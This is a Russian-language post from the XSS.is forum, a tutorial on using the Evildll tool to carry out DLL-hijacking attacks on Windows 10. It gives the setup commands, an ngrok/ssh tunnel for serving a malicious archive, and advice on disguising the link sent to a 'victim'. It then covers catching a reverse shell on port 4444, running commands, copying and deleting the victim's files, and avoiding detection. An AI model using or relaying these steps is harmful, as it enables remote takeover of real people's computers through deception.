• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Evildll и атака dll hijacking

tabac

CPU register
Пользователь
Регистрация
30.09.2018
Сообщения
1 610
Решения
1
Реакции
3 332
Рассмотрим интересный инструмент, автором которого является Thelinuxchoice. Не менее интересен и способ атаки, для реализации которой и появился Evildll. Компания Microsoft регулярно пытается бороться с атаками Dll Hijacking. Здесь будет представлен один из способов такой атаки.
Кратко: приложение exe при запуске подгружает вредоносный файл библиотеки dll. В итоге, создаются ярлыки cmd с powershell, либо их дубликаты с последующим их вызовом и reverse shell.

Установка:
Код:
git clone https://github.com/thelinuxchoice/evildll.git
apt-get install mingw-w64
cd evildll/
chmod +x evildll.sh
bash evildll.sh
В работе использовалcя дистрибутив Blackarch, так что установка пакета mingw-w64 не потребовалась. Для Kali Linux и др.его придётся установить.

Инструмент капризный и немало времени ушло на изучение тонкостей. Один из первых неприятных моментов заключается в том, что требуется authtoken для ngrok. При первом запуске Evildll сам установит ngrok, но потребует сохранения токена.

Пробовал закомментировать участок кода, отвечающий за проверку токена, но могут возникнуть проблемы с запуском listener. Увы, но лучше этот token где-то достать, либо регистрироваться.

Теперь, когда в директории evildll появился файл ngrok, выполняем:
Код:
chmod +x ngrok
./ngrok authtoken значение_token
Если посмотреть на код evildll.sh, то можно видеть майнкрафтовский ip-шник.

Атаковать будем пробовать Windows 10. После запуска инструмента, если с токеном всё в порядке, то предлагается 2 варианта реализации атаки. Второй для локальной сетки, либо глобальной WAN, параметры задаёте сами IP (статика) атакующего хоста:порт

При первом способе нам сгенерируется ссылка для платформы ngrok и сервера, работающего на порте 3333. Ссылку вида 0.tcp.ngrok.io:порт шифруем и публикуем для жертвы. Также можно воспользоваться командой в другом терминале
Код:
ssh -R 80:localhost:3333 custom-subdomain@ssh.localhost.run
Это откроет доступ по ssh для скачивания сгенерированного архива и создаст 2 ссылки с протоколами http и https. Которые также можно завуалировать и отослать тестируемому субъекту.

Неприятность в том, что порты для ngrok в этом случае назначаются произвольно и это не всегда срабатывает. Если всё успешно, то жертве сразу предлагается скачивание и сохранение архива. Браузер только может предупредить о том, что данный файл загружают редко и не более того.
Evildll сразу же сообщит о активности перехода по ссылке и предложит активировать listener на 4444 порте.

Атакуемый субъект должен разархивировать архив и запустить приложение exe. Т.к. если запустить из архива приложение, то ничего не выйдет и выбьет ошибку. Если запуск произошел удачно, можно посмотреть файлы Microsoft, выполнять системные команды, копировать файлы, удалять их, запускать службы. Не запускайте только активные приложения, т.к. это явное самообнаружение (представьте, что у компа чистый рабочий стол, а тут, вдруг, запустился браузер, или скайп). В директории инструмента после успешной сессии данные будут сохранены в файл saved. При следующей атаке желательно удалить этот файл с архивом, файл с одноимённым наименованием zip-архива и index.php (они создадутся заново).

По материалам Vertigo
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх